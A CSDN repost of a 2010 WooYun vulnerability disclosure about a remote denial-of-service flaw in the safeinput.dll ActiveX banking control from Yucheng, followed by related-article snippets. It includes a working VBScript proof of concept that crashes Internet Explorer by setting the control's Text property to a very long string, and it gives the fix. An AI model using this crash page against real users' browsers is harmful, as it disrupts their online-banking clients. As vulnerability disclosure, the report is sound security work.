宇信易诚网银客户端安全控件存在远程拒绝服务漏洞

最新推荐文章于 2024-09-07 22:37:02 发布
最新推荐文章于 2024-09-07 22:37:02 发布
阅读量1.4k 收藏
点赞数
文章标签: web安全 安全 hack 网络安全 wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124187731
版权

漏洞详情

披露状态:

2010-07-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-07-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

北京宇信易诚是国内领先的网银解决方案提供商,在国内拥有大量的银行客户(客户列表http://www.yuchengtech.com/success.php),但是其网银客户端安全控件safeinput.dll存在远程拒绝服务漏洞可导致ie崩溃

详细说明:

Text变量长度未做控制,如果提交的过长的参数,之后的操作会导致内存异常,使IE崩溃出错
经过分析,该漏洞不能用来执行代码.

漏洞证明:

<html>
eChannels Century safeinput.dll test page
<object classid='clsid:ECCBA953-80E5-11D3-9285-0080ADB811C5' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\safeinput.dll"
prototype  = "Property Let Text As String"
memberName = "Text"
progid     = "safeSetInputLib.safeInput"
argCount   = 1
arg1=String(45530, "A")
target.Text = arg1
</script>

修复方案:

限制Text长度

版权声明:转载请注明来源 路人甲@乌云

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
EPoD: 以太坊Geth客户端拒绝服务漏洞 (CVE-2018-12018)
Fly_鹏程万里
07-15 969
迄今为止,PeckShield发现了很多严重的智能合约漏洞。除了智能合同外,以太坊生态系统还包括其他各种可能受到攻击的组件。显然,一个这样的组件是以太坊的核心,也就是每个以太坊节点上运行的底层客户端软件。如果攻击者使某个以太坊客户端/节点崩溃,那么此客户端/节点提供的计算能力也随之消失。如果大量以太坊的客户/节点突然间断线,他们相应的计算能力可能会立即失效,从而严重干扰以太坊的整个运营。在撰写本文...
android 拒绝服务漏洞,Android APP通用型拒绝服务漏洞分析报告
weixin_26834281的博客
05-25 117
点评:记得曾经有段时间很多SRC平台被刷了大量APP本地拒绝服务漏洞,移动安全团队爱内测(ineice.com)发现了一个安卓客户端的通用型拒绝服务漏洞,来看看他们的详细分析吧。0xr0ot和Xbalien交流所有可能导致应用拒绝服务的异常类型时,发现了一处通用的本地拒绝服务漏洞。该通用型本地拒绝服务可以造成大面积的app拒绝服务。针对序列化对象而出现的拒绝服务主要是由于应用中使用了getSeri...
Web下的拒绝服务漏洞(DoS)
yggcwhat
09-29 2497
Web下的拒绝服务漏洞(DoS)
宇信易诚java面试_宇信易诚笔试题
weixin_39726697的博客
03-02 153
我知道笔试B是英文水平测试,包括三部分,单词、英译汉、作文,难度都不大但是他们的要求非常之高,总共6个题,共11个空,我们必须对9个才算及格,也就是说最多错一道题吧,因为有些题是3个空,有些是2个空,1个空的就那么1、2道吧。题型大概是这样的:题目大概都是在10多个框中放10多个数字,然后根据框中的数字来完成图表中(流程控制图)的逻辑判断和逻辑走向以此来给出它所要求的空的答案。选择题1:鉴于Jav...
宇信易诚 两季度亏损与高管出走的背后
cyl937的专栏
02-12 5508
上市之初的宇信易诚(NASDAQ:YTEC),曾经连续两业绩增长速度超过40%。那个一度产品线最全、品牌影响力最大、资金最雄厚的金融行业方案商——宇信易诚,近两个季度却出现了业绩的连续亏损。这在宇信易诚、乃至其前身宇信鸿泰的发展史上前所未有。而上市数间,多位高管离职,带走了业务团队,带走了客户,这一切的背后到底发生了什么?又是什么成为矛盾激化的导火索?   两季度亏损359万美元
宇信易诚Liana银行系统软件界面设计
Chris Ning'Blog
04-23 379
宇信易诚Liana银行系统软件界面设计
宇信易诚 为何成长如此之快
hualusiyu的专栏
04-08 2920
宇信易诚:服务中国金融 在洪卫东的眼睛里,我们几乎无法发现自得和欣喜,虽然他领导的北京宇信易诚科技有限公司刚刚在今三月成为国内第一家在纳斯达克上市的金融行业应用软件服务公司,并且洪卫东本人作为宇信易诚的CEO,被评为2006度IT渠道十大度人物。   北京雨后的下午,把自己塞在办公室宽大沙发上的洪卫东,和笔者聊得最多的,是他对于公司核心竞争力的分析,以及对于金融IT
宇信易诚“高级系统架构师”内训圆满结束
中科院计算所培训中心
12-04 1449
宇信易诚“高级系统架构师”课程于2013.11.30-12.1成功举办。在这两天的时间里,宇信易诚的几十位技术负责人及骨干同谢老师和袁老师一起畅游在思考的海洋,充分吸取并享受着知识的养分…… 课前有个小细节值得一说,课前的课桌是讨论岛屿式摆放,谢老师倒现场后,要求改成课桌式,门道在于技术是严肃的课程,是思考的课程,是需要大脑高度集中高度转动的课程,要给大家一个思考的氛围!课上大家非常认真
[java面试]宇信易诚 广州分公司 java笔试题目回忆录
苏生-苏米沿的专栏
06-04 4474
记录一下最近面试的时候遇见的几个问题,反思总结,方便下次面试:先看下北京宇信易诚网络技术经常考的几个问题吧:一.面试试题背景内容报文格式定义如下:20字符长的姓名+1字符长的性别+3字符长的龄姓名长度不足20的右边补空格 性别中0表示男,1表示女龄不足3字符的左边补0如:denny     0026这一段报文解析后表示姓名为denny性别为男,龄为26数据库表结构如下:create tabl
宇信易诚EMP入门开发指南.rar
09-12
宇信易诚EMP(Enterprise Mobile Platform)是一款专为企业级移动应用开发设计的平台,它提供了丰富的功能和组件,便于开发者快速构建稳定、安全的移动应用。EMP主要关注于银行和其他金融机构的业务流程,旨在提高...
易诚世纪 Liana 网上银行解决方案
07-09
易诚世纪的Liana网上银行解决方案是针对国内金融机构在金融创新和服务方式方面日益增长的复杂需求而设计的。随着电子商务的崛起和WTO的影响,银行需要建立特色化的网上银行系统,优化IT架构以降低成本,同时确保系统...
YXTX_Android:我的博客【宇信同行】Android手机客户端源码,对学习Material Design的一个初步总结
04-30
【宇信同行】Android手机客户端源码是基于Material Design设计规范开发的一款应用,它为学习者提供了一个深入了解和实践这一现代Android设计风格的平台。Material Design是Google推出的一种跨平台的设计语言,旨在...
300674_宇信科技上市招股说明书.pdf
05-12
- **业务概述**:根据文件提供的信息推测,宇信科技可能是一家提供信息技术服务的企业,具体业务范围可能涉及软件开发、系统集成、技术服务等。 #### 二、上市信息 - **上市地点**:深圳证券交易所 - **上市板块**...
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1339
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
最新发布
等风来
09-07 94
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
Web安全之SQL注入:如何预防及解决
weixin_39996520的博客
09-07 819
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 565
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-06 844
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值